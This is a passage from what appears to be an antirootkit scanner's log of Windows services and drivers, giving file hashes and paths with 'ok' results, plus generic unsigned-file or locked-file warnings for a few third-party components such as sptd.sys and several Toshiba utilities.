13:29:32.0578 4240	NdisTapi (0e186e90404980569fb449ba7519ae61) C:\Windows\system32\DRIVERS\ndistapi.sys
13:29:32.0603 4240	NdisTapi - ok
13:29:32.0639 4240	Ndisuio (d6973aa34c4d5d76c0430b181c3cd389) C:\Windows\system32\DRIVERS\ndisuio.sys
13:29:32.0691 4240	Ndisuio - ok
13:29:32.0809 4240	NdisWan (818f648618ae34f729fdb47ec68345c3) C:\Windows\system32\DRIVERS\ndiswan.sys
13:29:32.0836 4240	NdisWan - ok
13:29:32.0906 4240	NDProxy (71dab552b41936358f3b541ae5997fb3) C:\Windows\system32\drivers\NDProxy.sys
13:29:32.0959 4240	NDProxy - ok
13:29:33.0003 4240	NetBIOS (bcd093a5a6777cf626434568dc7dba78) C:\Windows\system32\DRIVERS\netbios.sys
13:29:33.0046 4240	NetBIOS - ok
13:29:33.0199 4240	netbt (ecd64230a59cbd93c85f1cd1cab9f3f6) C:\Windows\system32\DRIVERS\netbt.sys
13:29:33.0275 4240	netbt - ok
13:29:33.0325 4240	Netlogon (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:29:33.0341 4240	Netlogon - ok
13:29:33.0489 4240	Netman (c8052711daecc48b982434c5116ca401) C:\Windows\System32\netman.dll
13:29:33.0546 4240	Netman - ok
13:29:33.0610 4240	netprofm (2ef3bbe22e5a5acd1428ee387a0d0172) C:\Windows\System32\netprofm.dll
13:29:33.0649 4240	netprofm - ok
13:29:33.0763 4240	NetTcpPortSharing (d6c4e4a39a36029ac0813d476fbd0248) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
13:29:33.0778 4240	NetTcpPortSharing - ok
13:29:33.0854 4240	nfrd960 (2e7fb731d4790a1bc6270accefacb36e) C:\Windows\system32\drivers\nfrd960.sys
13:29:33.0869 4240	nfrd960 - ok
13:29:33.0940 4240	NisDrv (b52f26bade7d7e4a79706e3fd91834cd) C:\Windows\system32\DRIVERS\NisDrvWFP.sys
13:29:33.0956 4240	NisDrv - ok
13:29:34.0134 4240	NisSrv (290c0d4c4889398797f8df3be00b9698) c:\Program Files\Microsoft Security Client\NisSrv.exe
13:29:34.0156 4240	NisSrv - ok
13:29:34.0228 4240	NlaSvc (2997b15415f9bbe05b5a4c1c85e0c6a2) C:\Windows\System32\nlasvc.dll
13:29:34.0275 4240	NlaSvc - ok
13:29:34.0344 4240	Npfs (d36f239d7cce1931598e8fb90a0dbc26) C:\Windows\system32\drivers\Npfs.sys
13:29:34.0368 4240	Npfs - ok
13:29:34.0434 4240	nsi (8bb86f0c7eea2bded6fe095d0b4ca9bd) C:\Windows\system32\nsisvc.dll
13:29:34.0480 4240	nsi - ok
13:29:34.0546 4240	nsiproxy (609773e344a97410ce4ebf74a8914fcf) C:\Windows\system32\drivers\nsiproxy.sys
13:29:34.0573 4240	nsiproxy - ok
13:29:34.0983 4240	Ntfs (6a4a98cee84cf9e99564510dda4baa47) C:\Windows\system32\drivers\Ntfs.sys
13:29:35.0028 4240	Ntfs - ok
13:29:35.0086 4240	ntrigdigi (e875c093aec0c978a90f30c9e0dfbb72) C:\Windows\system32\drivers\ntrigdigi.sys
13:29:35.0143 4240	ntrigdigi - ok
13:29:35.0206 4240	Null (c5dbbcda07d780bda9b685df333bb41e) C:\Windows\system32\drivers\Null.sys
13:29:35.0257 4240	Null - ok
13:29:35.0280 4240	nvraid (e69e946f80c1c31c53003bfbf50cbb7c) C:\Windows\system32\drivers\nvraid.sys
13:29:35.0296 4240	nvraid - ok
13:29:35.0327 4240	nvstor (9e0ba19a28c498a6d323d065db76dffc) C:\Windows\system32\drivers\nvstor.sys
13:29:35.0342 4240	nvstor - ok
13:29:35.0422 4240	nv_agp (07c186427eb8fcc3d8d7927187f260f7) C:\Windows\system32\drivers\nv_agp.sys
13:29:35.0438 4240	nv_agp - ok
13:29:35.0444 4240	NwlnkFlt - ok
13:29:35.0452 4240	NwlnkFwd - ok
13:29:35.0522 4240	ohci1394 (6f310e890d46e246e0e261a63d9b36b4) C:\Windows\system32\DRIVERS\ohci1394.sys
13:29:35.0559 4240	ohci1394 - ok
13:29:35.0827 4240	p2pimsvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:29:35.0952 4240	p2pimsvc - ok
13:29:35.0962 4240	p2psvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:29:35.0993 4240	p2psvc - ok
13:29:36.0040 4240	Parport (0fa9b5055484649d63c303fe404e5f4d) C:\Windows\system32\drivers\parport.sys
13:29:36.0113 4240	Parport - ok
13:29:36.0161 4240	partmgr (b9c2b89f08670e159f7181891e449cd9) C:\Windows\system32\drivers\partmgr.sys
13:29:36.0177 4240	partmgr - ok
13:29:36.0259 4240	Parvdm (4f9a6a8a31413180d0fcb279ad5d8112) C:\Windows\system32\drivers\parvdm.sys
13:29:36.0347 4240	Parvdm - ok
13:29:36.0406 4240	PcaSvc (c6276ad11f4bb49b58aa1ed88537f14a) C:\Windows\System32\pcasvc.dll
13:29:36.0487 4240	PcaSvc - ok
13:29:36.0600 4240	pci (941dc1d19e7e8620f40bbc206981efdb) C:\Windows\system32\drivers\pci.sys
13:29:36.0647 4240	pci - ok
13:29:36.0664 4240	pciide (1636d43f10416aeb483bc6001097b26c) C:\Windows\system32\drivers\pciide.sys
13:29:36.0679 4240	pciide - ok
13:29:36.0785 4240	pcmcia (3bb2244f343b610c29c98035504c9b75) C:\Windows\system32\DRIVERS\pcmcia.sys
13:29:36.0805 4240	pcmcia - ok
13:29:36.0877 4240	pcouffin (5b6c11de7e839c05248ced8825470fef) C:\Windows\system32\Drivers\pcouffin.sys
13:29:36.0960 4240	pcouffin - ok
13:29:37.0032 4240	PEAUTH (6349f6ed9c623b44b52ea3c63c831a92) C:\Windows\system32\drivers\peauth.sys
13:29:37.0147 4240	PEAUTH - ok
13:29:37.0239 4240	pinger (6dbf2ac2bdaff355995ab25eccc4cfe1) C:\Toshiba\IVP\ISM\pinger.exe
13:29:37.0255 4240	pinger - ok
13:29:37.0815 4240	pla (b1689df169143f57053f795390c99db3) C:\Windows\system32\pla.dll
13:29:38.0072 4240	pla - ok
13:29:38.0594 4240	PlugPlay (c5e7f8a996ec0a82d508fd9064a5569e) C:\Windows\system32\umpnpmgr.dll
13:29:38.0670 4240	PlugPlay - ok
13:29:38.0791 4240	PNRPAutoReg (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:29:38.0842 4240	PNRPAutoReg - ok
13:29:38.0853 4240	PNRPsvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:29:38.0920 4240	PNRPsvc - ok
13:29:38.0988 4240	PolicyAgent (d0494460421a03cd5225cca0059aa146) C:\Windows\System32\ipsecsvc.dll
13:29:39.0062 4240	PolicyAgent - ok
13:29:39.0198 4240	PptpMiniport (ecfffaec0c1ecd8dbc77f39070ea1db1) C:\Windows\system32\DRIVERS\raspptp.sys
13:29:39.0240 4240	PptpMiniport - ok
13:29:39.0330 4240	Processor (0e3cef5d28b40cf273281d620c50700a) C:\Windows\system32\drivers\processr.sys
13:29:39.0413 4240	Processor - ok
13:29:39.0481 4240	ProfSvc (0508faa222d28835310b7bfca7a77346) C:\Windows\system32\profsvc.dll
13:29:39.0529 4240	ProfSvc - ok
13:29:39.0597 4240	ProtectedStorage (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:29:39.0614 4240	ProtectedStorage - ok
13:29:39.0681 4240	PSched (99514faa8df93d34b5589187db3aa0ba) C:\Windows\system32\DRIVERS\pacer.sys
13:29:39.0707 4240	PSched - ok
13:29:39.0964 4240	ql2300 (ccdac889326317792480c0a67156a1ec) C:\Windows\system32\drivers\ql2300.sys
13:29:40.0003 4240	ql2300 - ok
13:29:40.0083 4240	ql40xx (81a7e5c076e59995d54bc1ed3a16e60b) C:\Windows\system32\drivers\ql40xx.sys
13:29:40.0100 4240	ql40xx - ok
13:29:40.0266 4240	QWAVE (e9ecae663f47e6cb43962d18ab18890f) C:\Windows\system32\qwave.dll
13:29:40.0330 4240	QWAVE - ok
13:29:40.0385 4240	QWAVEdrv (9f5e0e1926014d17486901c88eca2db7) C:\Windows\system32\drivers\qwavedrv.sys
13:29:40.0420 4240	QWAVEdrv - ok
13:29:40.0510 4240	RasAcd (147d7f9c556d259924351feb0de606c3) C:\Windows\system32\DRIVERS\rasacd.sys
13:29:40.0560 4240	RasAcd - ok
13:29:40.0612 4240	RasAuto (f6a452eb4ceadbb51c9e0ee6b3ecef0f) C:\Windows\System32\rasauto.dll
13:29:40.0662 4240	RasAuto - ok
13:29:40.0718 4240	Rasl2tp (a214adbaf4cb47dd2728859ef31f26b0) C:\Windows\system32\DRIVERS\rasl2tp.sys
13:29:40.0849 4240	Rasl2tp - ok
13:29:40.0919 4240	RasMan (75d47445d70ca6f9f894b032fbc64fcf) C:\Windows\System32\rasmans.dll
13:29:40.0982 4240	RasMan - ok
13:29:41.0037 4240	RasPppoe (509a98dd18af4375e1fc40bc175f1def) C:\Windows\system32\DRIVERS\raspppoe.sys
13:29:41.0078 4240	RasPppoe - ok
13:29:41.0152 4240	RasSstp (2005f4a1e05fa09389ac85840f0a9e4d) C:\Windows\system32\DRIVERS\rassstp.sys
13:29:41.0189 4240	RasSstp - ok
13:29:41.0253 4240	rdbss (b14c9d5b9add2f84f70570bbbfaa7935) C:\Windows\system32\DRIVERS\rdbss.sys
13:29:41.0290 4240	rdbss - ok
13:29:41.0336 4240	RDPCDD (89e59be9a564262a3fb6c4f4f1cd9899) C:\Windows\system32\DRIVERS\RDPCDD.sys
13:29:41.0388 4240	RDPCDD - ok
13:29:41.0452 4240	rdpdr (e8bd98d46f2ed77132ba927fccb47d8b) C:\Windows\system32\drivers\rdpdr.sys
13:29:41.0513 4240	rdpdr - ok
13:29:41.0519 4240	RDPENCDD (9d91fe5286f748862ecffa05f8a0710c) C:\Windows\system32\drivers\rdpencdd.sys
13:29:41.0552 4240	RDPENCDD - ok
13:29:41.0642 4240	RDPWD (79c6df8477250f5c54f7c5ae1d6b814e) C:\Windows\system32\drivers\RDPWD.sys
13:29:41.0682 4240	RDPWD - ok
13:29:41.0748 4240	RemoteAccess (bcdd6b4804d06b1f7ebf29e53a57ece9) C:\Windows\System32\mprdim.dll
13:29:41.0782 4240	RemoteAccess - ok
13:29:41.0850 4240	RemoteRegistry (9e6894ea18daff37b63e1005f83ae4ab) C:\Windows\system32\regsvc.dll
13:29:41.0906 4240	RemoteRegistry - ok
13:29:41.0925 4240	RpcLocator (5123f83cbc4349d065534eeb6bbdc42b) C:\Windows\system32\locator.exe
13:29:42.0024 4240	RpcLocator - ok
13:29:42.0162 4240	RpcSs (3b5b4d53fec14f7476ca29a20cc31ac9) C:\Windows\system32\rpcss.dll
13:29:42.0232 4240	RpcSs - ok
13:29:42.0286 4240	rspndr (9c508f4074a39e8b4b31d27198146fad) C:\Windows\system32\DRIVERS\rspndr.sys
13:29:42.0329 4240	rspndr - ok
13:29:42.0363 4240	RTL8169 (5163f804256deb8cf1ef64b780a18caa) C:\Windows\system32\DRIVERS\Rtlh86.sys
13:29:42.0421 4240	RTL8169 - ok
13:29:42.0498 4240	SamSs (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:29:42.0515 4240	SamSs - ok
13:29:42.0594 4240	sbp2port (3ce8f073a557e172b330109436984e30) C:\Windows\system32\drivers\sbp2port.sys
13:29:42.0610 4240	sbp2port - ok
13:29:42.0707 4240	SCardSvr (77b7a11a0c3d78d3386398fbbea1b632) C:\Windows\System32\SCardSvr.dll
13:29:42.0764 4240	SCardSvr - ok
13:29:43.0049 4240	Schedule (1a58069db21d05eb2ab58ee5753ebe8d) C:\Windows\system32\schedsvc.dll
13:29:43.0143 4240	Schedule - ok
13:29:43.0205 4240	SCPolicySvc (312ec3e37a0a1f2006534913e37b4423) C:\Windows\System32\certprop.dll
13:29:43.0229 4240	SCPolicySvc - ok
13:29:44.0280 4240	sdbus (8f36b54688c31eed4580129040c6a3d3) C:\Windows\system32\DRIVERS\sdbus.sys
13:29:44.0306 4240	sdbus - ok
13:29:44.0400 4240	SDRSVC (716313d9f6b0529d03f726d5aaf6f191) C:\Windows\System32\SDRSVC.dll
13:29:44.0469 4240	SDRSVC - ok
13:29:44.0498 4240	secdrv (90a3935d05b494a5a39d37e71f09a677) C:\Windows\system32\drivers\secdrv.sys
13:29:44.0557 4240	secdrv - ok
13:29:44.0609 4240	seclogon (fd5199d4d8a521005e4b5ee7fe00fa9b) C:\Windows\system32\seclogon.dll
13:29:44.0657 4240	seclogon - ok
13:29:44.0674 4240	SENS (a9bbab5759771e523f55563d6cbe140f) C:\Windows\system32\sens.dll
13:29:44.0734 4240	SENS - ok
13:29:44.0758 4240	Serenum (68e44e331d46f0fb38f0863a84cd1a31) C:\Windows\system32\drivers\serenum.sys
13:29:44.0839 4240	Serenum - ok
13:29:44.0900 4240	Serial (c70d69a918b178d3c3b06339b40c2e1b) C:\Windows\system32\drivers\serial.sys
13:29:44.0958 4240	Serial - ok
13:29:45.0069 4240	sermouse (8af3d28a879bf75db53a0ee7a4289624) C:\Windows\system32\drivers\sermouse.sys
13:29:45.0072 4240	sermouse - ok
13:29:45.0363 4240	ServiceLayer (56eb980da71b94b79a341615c3c256cf) C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
13:29:45.0396 4240	ServiceLayer ( UnsignedFile.Multi.Generic ) - warning
13:29:45.0397 4240	ServiceLayer - detected UnsignedFile.Multi.Generic (1)
13:29:45.0502 4240	SessionEnv (d2193326f729b163125610dbf3e17d57) C:\Windows\system32\sessenv.dll
13:29:45.0558 4240	SessionEnv - ok
13:29:45.0597 4240	sffdisk (3efa810bdca87f6ecc24f9832243fe86) C:\Windows\system32\DRIVERS\sffdisk.sys
13:29:45.0644 4240	sffdisk - ok
13:29:45.0699 4240	sffp_mmc (8fd08a310645fe872eeec6e08c6bf3ee) C:\Windows\system32\drivers\sffp_mmc.sys
13:29:45.0778 4240	sffp_mmc - ok
13:29:45.0838 4240	sffp_sd (9f66a46c55d6f1ccabc79bb7afccc545) C:\Windows\system32\DRIVERS\sffp_sd.sys
13:29:45.0864 4240	sffp_sd - ok
13:29:45.0926 4240	sfloppy (46ed8e91793b2e6f848015445a0ac188) C:\Windows\system32\drivers\sfloppy.sys
13:29:46.0003 4240	sfloppy - ok
13:29:46.0083 4240	SharedAccess (e1499bd0ff76b1b2fbbf1af339d91165) C:\Windows\System32\ipnathlp.dll
13:29:46.0145 4240	SharedAccess - ok
13:29:46.0199 4240	ShellHWDetection (c7230fbee14437716701c15be02c27b8) C:\Windows\System32\shsvcs.dll
13:29:46.0242 4240	ShellHWDetection - ok
13:29:46.0266 4240	SI3132 (7d494c2000287595d87b9ff6b080d3ff) C:\Windows\system32\DRIVERS\SI3132.sys
13:29:46.0281 4240	SI3132 - ok
13:29:46.0349 4240	SiFilter (df978385397187ba5e5e1c9c56a80a1a) C:\Windows\system32\DRIVERS\SiWinAcc.sys
13:29:46.0362 4240	SiFilter - ok
13:29:46.0400 4240	simptcp (a275fbb7c99458c12e088dff3e58eb4d) C:\Windows\System32\tcpsvcs.exe
13:29:46.0472 4240	simptcp - ok
13:29:46.0495 4240	SiRemFil (aaab072321d75a366269a6d089f3d71e) C:\Windows\system32\DRIVERS\SiRemFil.sys
13:29:46.0508 4240	SiRemFil - ok
13:29:46.0532 4240	sisagp (d2a595d6eebeeaf4334f8e50efbc9931) C:\Windows\system32\drivers\sisagp.sys
13:29:46.0548 4240	sisagp - ok
13:29:46.0590 4240	SiSRaid2 (cedd6f4e7d84e9f98b34b3fe988373aa) C:\Windows\system32\drivers\sisraid2.sys
13:29:46.0605 4240	SiSRaid2 - ok
13:29:46.0627 4240	SiSRaid4 (df843c528c4f69d12ce41ce462e973a7) C:\Windows\system32\drivers\sisraid4.sys
13:29:46.0643 4240	SiSRaid4 - ok
13:29:46.0935 4240	slsvc (862bb4cbc05d80c5b45be430e5ef872f) C:\Windows\system32\SLsvc.exe
13:29:47.0207 4240	slsvc - ok
13:29:47.0432 4240	SLUINotify (6edc422215cd78aa8a9cde6b30abbd35) C:\Windows\system32\SLUINotify.dll
13:29:47.0459 4240	SLUINotify - ok
13:29:47.0543 4240	Smb (7b75299a4d201d6a6533603d6914ab04) C:\Windows\system32\DRIVERS\smb.sys
13:29:47.0568 4240	Smb - ok
13:29:47.0613 4240	SNMPTRAP (2a146a055b4401c16ee62d18b8e2a032) C:\Windows\System32\snmptrap.exe
13:29:47.0631 4240	SNMPTRAP - ok
13:29:47.0696 4240	spldr (7aebdeef071fe28b0eef2cdd69102bff) C:\Windows\system32\drivers\spldr.sys
13:29:47.0712 4240	spldr - ok
13:29:47.0786 4240	Spooler (8554097e5136c3bf9f69fe578a1b35f4) C:\Windows\System32\spoolsv.exe
13:29:47.0910 4240	Spooler - ok
13:29:48.0025 4240	sptd (7f1b7c4d446cd3f926af45b8c48bd593) C:\Windows\system32\Drivers\sptd.sys
13:29:48.0026 4240	Suspicious file (NoAccess): C:\Windows\system32\Drivers\sptd.sys. md5: 7f1b7c4d446cd3f926af45b8c48bd593
13:29:48.0028 4240	sptd ( LockedFile.Multi.Generic ) - warning
13:29:48.0028 4240	sptd - detected LockedFile.Multi.Generic (1)
13:29:48.0115 4240	srv (41987f9fc0e61adf54f581e15029ad91) C:\Windows\system32\DRIVERS\srv.sys
13:29:48.0188 4240	srv - ok
13:29:48.0254 4240	srv2 (ff33aff99564b1aa534f58868cbe41ef) C:\Windows\system32\DRIVERS\srv2.sys
13:29:48.0297 4240	srv2 - ok
13:29:48.0326 4240	srvnet (7605c0e1d01a08f3ecd743f38b834a44) C:\Windows\system32\DRIVERS\srvnet.sys
13:29:48.0356 4240	srvnet - ok
13:29:48.0420 4240	SSDPSRV (03d50b37234967433a5ea5ba72bc0b62) C:\Windows\System32\ssdpsrv.dll
13:29:48.0465 4240	SSDPSRV - ok
13:29:48.0574 4240	SstpSvc (6f1a32e7b7b30f004d9a20afadb14944) C:\Windows\system32\sstpsvc.dll
13:29:48.0615 4240	SstpSvc - ok
13:29:48.0781 4240	StarWindServiceAE (b1691af4a072cb674d600db16dd7308e) C:\Program Files\Alcohol Soft\Alcohol 52\StarWind\StarWindServiceAE.exe
13:29:48.0819 4240	StarWindServiceAE ( UnsignedFile.Multi.Generic ) - warning
13:29:48.0819 4240	StarWindServiceAE - detected UnsignedFile.Multi.Generic (1)
13:29:48.0881 4240	StillCam (ef70b3d22b4bffda6ea851ecb063efaa) C:\Windows\system32\DRIVERS\serscan.sys
13:29:48.0996 4240	StillCam - ok
13:29:49.0104 4240	stisvc (5de7d67e49b88f5f07f3e53c4b92a352) C:\Windows\System32\wiaservc.dll
13:29:49.0161 4240	stisvc - ok
13:29:49.0239 4240	swenum (7ba58ecf0c0a9a69d44b3dca62becf56) C:\Windows\system32\DRIVERS\swenum.sys
13:29:49.0240 4240	swenum - ok
13:29:49.0485 4240	swprv (f21fd248040681cca1fb6c9a03aaa93d) C:\Windows\System32\swprv.dll
13:29:49.0555 4240	swprv - ok
13:29:49.0614 4240	Swupdtmr (327786c5d6bcf284fab14c2b5751f514) c:\Toshiba\IVP\swupdate\swupdtmr.exe
13:29:49.0627 4240	Swupdtmr - ok
13:29:49.0676 4240	Symc8xx (192aa3ac01df071b541094f251deed10) C:\Windows\system32\drivers\symc8xx.sys
13:29:49.0691 4240	Symc8xx - ok
13:29:49.0742 4240	Sym_hi (8c8eb8c76736ebaf3b13b633b2e64125) C:\Windows\system32\drivers\sym_hi.sys
13:29:49.0757 4240	Sym_hi - ok
13:29:49.0776 4240	Sym_u3 (8072af52b5fd103bbba387a1e49f62cb) C:\Windows\system32\drivers\sym_u3.sys
13:29:49.0792 4240	Sym_u3 - ok
13:29:49.0847 4240	SynTP (5efcedcf3daf5c8d9e8b77a34a4eec99) C:\Windows\system32\DRIVERS\SynTP.sys
13:29:49.0866 4240	SynTP - ok
13:29:49.0971 4240	SysMain (9a51b04e9886aa4ee90093586b0ba88d) C:\Windows\system32\sysmain.dll
13:29:50.0075 4240	SysMain - ok
13:29:50.0119 4240	TabletInputService (2dca225eae15f42c0933e998ee0231c3) C:\Windows\System32\TabSvc.dll
13:29:50.0152 4240	TabletInputService - ok
13:29:50.0256 4240	TapiSrv (d7673e4b38ce21ee54c59eeeb65e2483) C:\Windows\System32\tapisrv.dll
13:29:50.0272 4240	TapiSrv - ok
13:29:50.0443 4240	TBS (cb05822cd9cc6c688168e113c603dbe7) C:\Windows\System32\tbssvc.dll
13:29:50.0493 4240	TBS - ok
13:29:50.0661 4240	Tcpip (ee7e10bed85c312c1d5d30c435bdda9f) C:\Windows\system32\drivers\tcpip.sys
13:29:50.0759 4240	Tcpip - ok
13:29:50.0773 4240	Tcpip6 (ee7e10bed85c312c1d5d30c435bdda9f) C:\Windows\system32\DRIVERS\tcpip.sys
13:29:50.0865 4240	Tcpip6 - ok
13:29:50.0904 4240	tcpipreg (2c2d4cff5e09c73908f9b5af49a51365) C:\Windows\system32\drivers\tcpipreg.sys
13:29:50.0973 4240	tcpipreg - ok
13:29:51.0003 4240	tdcmdpst (1825bceb47bf41c5a9f0e44de82fc27a) C:\Windows\system32\DRIVERS\tdcmdpst.sys
13:29:51.0030 4240	tdcmdpst - ok
13:29:51.0073 4240	TDPIPE (5dcf5e267be67a1ae926f2df77fbcc56) C:\Windows\system32\drivers\tdpipe.sys
13:29:51.0120 4240	TDPIPE - ok
13:29:51.0138 4240	TDTCP  (389c63e32b3cefed425b61ed92d3f021) C:\Windows\system32\drivers\tdtcp.sys
13:29:51.0189 4240	TDTCP - ok
13:29:51.0307 4240	tdx (76b06eb8a01fc8624d699e7045303e54) C:\Windows\system32\DRIVERS\tdx.sys
13:29:51.0322 4240	tdx - ok
13:29:51.0549 4240	TeamViewer6 (fe559178000347d2ca1b7847f0379749) C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
13:29:51.0685 4240	TeamViewer6 - ok
13:29:51.0905 4240	TermDD (3cad38910468eab9a6479e2f01db43c7) C:\Windows\system32\DRIVERS\termdd.sys
13:29:51.0921 4240	TermDD - ok
13:29:52.0006 4240	TermService (bb95da09bef6e7a131bff3ba5032090d) C:\Windows\System32\termsrv.dll
13:29:52.0121 4240	TermService - ok
13:29:52.0200 4240	Themes (c7230fbee14437716701c15be02c27b8) C:\Windows\system32\shsvcs.dll
13:29:52.0221 4240	Themes - ok
13:29:52.0339 4240	THREADORDER (1076ffcffaae8385fd62dfcb25ac4708) C:\Windows\system32\mmcss.dll
13:29:52.0371 4240	THREADORDER - ok
13:29:52.0415 4240	tifm21 (28b7f973c36d157a7885b1ae42a4a2a9) C:\Windows\system32\drivers\tifm21.sys
13:29:52.0525 4240	tifm21 - ok
13:29:52.0647 4240	TNaviSrv (38e18dce385ff2ded57423a279559dbc) C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
13:29:52.0663 4240	TNaviSrv ( UnsignedFile.Multi.Generic ) - warning
13:29:52.0663 4240	TNaviSrv - detected UnsignedFile.Multi.Generic (1)
13:29:52.0684 4240	TODDSrv (d540858e65bfa6fded41ad2495ece344) C:\Windows\system32\TODDSrv.exe
13:29:52.0711 4240	TODDSrv ( UnsignedFile.Multi.Generic ) - warning
13:29:52.0711 4240	TODDSrv - detected UnsignedFile.Multi.Generic (1)
13:29:52.0849 4240	TosCoSrv (6a54c28b53c6b50d333c8ee974c6b208) C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
13:29:52.0970 4240	TosCoSrv - ok
13:29:52.0982 4240	Tosrfcom - ok
13:29:53.0062 4240	tos_sps32 (1ea5f27c29405bf49799feca77186da9) C:\Windows\system32\DRIVERS\tos_sps32.sys
13:29:53.0085 4240	tos_sps32 - ok
13:29:53.0091 4240	TpChoice - ok
13:29:53.0151 4240	TrkWks (ec74e77d0eb004bd3a809b5f8fb8c2ce) C:\Windows\System32\trkwks.dll
13:29:53.0186 4240	TrkWks - ok
13:29:53.0277 4240	TrustedInstaller (97d9d6a04e3ad9b6c626b9931db78dba) C:\Windows\servicing\TrustedInstaller.exe
13:29:53.0301 4240	TrustedInstaller - ok
13:29:53.0395 4240	tssecsrv (dcf0f056a2e4f52287264f5ab29cf206) C:\Windows\system32\DRIVERS\tssecsrv.sys
13:29:53.0417 4240	tssecsrv - ok
13:29:53.0467 4240	tunmp (caecc0120ac49e3d2f758b9169872d38) C:\Windows\system32\DRIVERS\tunmp.sys
13:29:53.0483 4240	tunmp - ok
13:29:53.0577 4240	tunnel (300db877ac094feab0be7688c3454a9c) C:\Windows\system32\DRIVERS\tunnel.sys
13:29:53.0592 4240	tunnel - ok
13:29:53.0624 4240	TVALZ (792a8b80f8188aba4b2be271583f3e46) C:\Windows\system32\DRIVERS\TVALZ_O.SYS
13:29:53.0637 4240	TVALZ - ok
13:29:53.0720 4240	uagp35 (c3ade15414120033a36c0f293d4a4121) C:\Windows\system32\drivers\uagp35.sys
13:29:53.0734 4240	uagp35 - ok
13:29:53.0862 4240	udfs (d9728af68c4c7693cb100b8441cbdec6) C:\Windows\system32\DRIVERS\udfs.sys
13:29:53.0891 4240	udfs - ok
13:29:53.0963 4240	UI0Detect (ecef404f62863755951e09c802c94ad5) C:\Windows\system32\UI0Detect.exe
13:29:53.0996 4240	UI0Detect - ok
13:29:54.0112 4240	UleadBurningHelper (332d341d92b933600d41953b08360dfb) C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
13:29:54.0137 4240	UleadBurningHelper ( UnsignedFile.Multi.Generic ) - warning
13:29:54.0137 4240	UleadBurningHelper - detected UnsignedFile.Multi.Generic (1)
13:29:54.0178 4240	uliagpkx (75e6890ebfce0841d3291b02e7a8bdb0) C:\Windows\system32\drivers\uliagpkx.sys
13:29:54.0193 4240	uliagpkx - ok
13:29:54.0260 4240	uliahci (3cd4ea35a6221b85dcc25daa46313f8d) C:\Windows\system32\drivers\uliahci.sys
13:29:54.0279 4240	uliahci - ok
13:29:54.0310 4240	UlSata (8514d0e5cd0534467c5fc61be94a569f) C:\Windows\system32\drivers\ulsata.sys
13:29:54.0327 4240	UlSata - ok
13:29:54.0408 4240	ulsata2 (38c3c6e62b157a6bc46594fada45c62b) C:\Windows\system32\drivers\ulsata2.sys
13:29:54.0438 4240	ulsata2 - ok
13:29:54.0481 4240	umbus (32cff9f809ae9aed85464492bf3e32d2) C:\Windows\system32\DRIVERS\umbus.sys
13:29:54.0525 4240	umbus - ok
13:29:54.0592 4240	upnphost (68308183f4ae0be7bf8ecd07cb297999) C:\Windows\System32\upnphost.dll
13:29:54.0655 4240	upnphost - ok
13:29:54.0734 4240	USBAAPL (83cafcb53201bbac04d822f32438e244) C:\Windows\system32\Drivers\usbaapl.sys
13:29:54.0812 4240	USBAAPL ( UnsignedFile.Multi.Generic ) - warning
13:29:54.0812 4240	USBAAPL - detected UnsignedFile.Multi.Generic (1)
13:29:54.0867 4240	usbaudio (32db9517628ff0d070682aab61e688f0) C:\Windows\system32\drivers\usbaudio.sys
13:29:54.0921 4240	usbaudio - ok
13:29:54.0977 4240	usbccgp (caf811ae4c147ffcd5b51750c7f09142) C:\Windows\system32\DRIVERS\usbccgp.sys
13:29:55.0090 4240	usbccgp - ok
13:29:55.0122 4240	usbcir (e9476e6c486e76bc4898074768fb7131) C:\Windows\system32\drivers\usbcir.sys
13:29:55.0201 4240	usbcir - ok
13:29:55.0226 4240	usbehci (79e96c23a97ce7b8f14d310da2db0c9b) C:\Windows\system32\DRIVERS\usbehci.sys
13:29:55.0259 4240	usbehci - ok
13:29:55.0286 4240	usbhub (4673bbcb006af60e7abddbe7a130ba42) C:\Windows\system32\DRIVERS\usbhub.sys
13:29:55.0340 4240	usbhub - ok
13:29:55.0397 4240	usbohci (ce697fee0d479290d89bec80dfe793b7) C:\Windows\system32\DRIVERS\usbohci.sys
13:29:55.0441 4240	usbohci - ok
13:29:55.0505 4240	usbprint (e75c4b5269091d15a2e7dc0b6d35f2f5) C:\Windows\system32\DRIVERS\usbprint.sys
13:29:55.0561 4240	usbprint - ok
13:29:55.0629 4240	usbscan (a508c9bd8724980512136b039bba65e9) C:\Windows\system32\DRIVERS\usbscan.sys
13:29:55.0654 4240	usbscan - ok
13:29:55.0743 4240	USBSTOR (be3da31c191bc222d9ad503c5224f2ad) C:\Windows\system32\DRIVERS\USBSTOR.SYS
13:29:55.0793 4240	USBSTOR - ok
13:29:55.0831 4240	usbuhci (325dbbacb8a36af9988ccf40eac228cc) C:\Windows\system32\DRIVERS\usbuhci.sys
13:29:55.0905 4240	usbuhci - ok
13:29:55.0946 4240	usbvideo (0a6b81f01bc86399482e27e6fda7b33b) C:\Windows\system32\Drivers\usbvideo.sys
13:29:56.0020 4240	usbvideo - ok
13:29:56.0051 4240	UVCFTR (5701a984efa8e209848a6d556dd02933) C:\Windows\system32\DRIVERS\UVCFTR_S.SYS
13:29:56.0074 4240	UVCFTR - ok
13:29:56.0142 4240	UxSms (1509e705f3ac1d474c92454a5c2dd81f) C:\Windows\System32\uxsms.dll
13:29:56.0186 4240	UxSms - ok
13:29:56.0288 4240	vds (cd88d1b7776dc17a119049742ec07eb4) C:\Windows\System32\vds.exe
13:29:56.0360 4240	vds - ok
13:29:56.0412 4240	vga (7d92be0028ecdedec74617009084b5ef) C:\Windows\system32\DRIVERS\vgapnp.sys
13:29:56.0492 4240	vga - ok
13:29:56.0556 4240	VgaSave (2e93ac0a1d8c79d019db6c51f036636c) C:\Windows\System32\drivers\vga.sys
13:29:56.0613 4240	VgaSave - ok
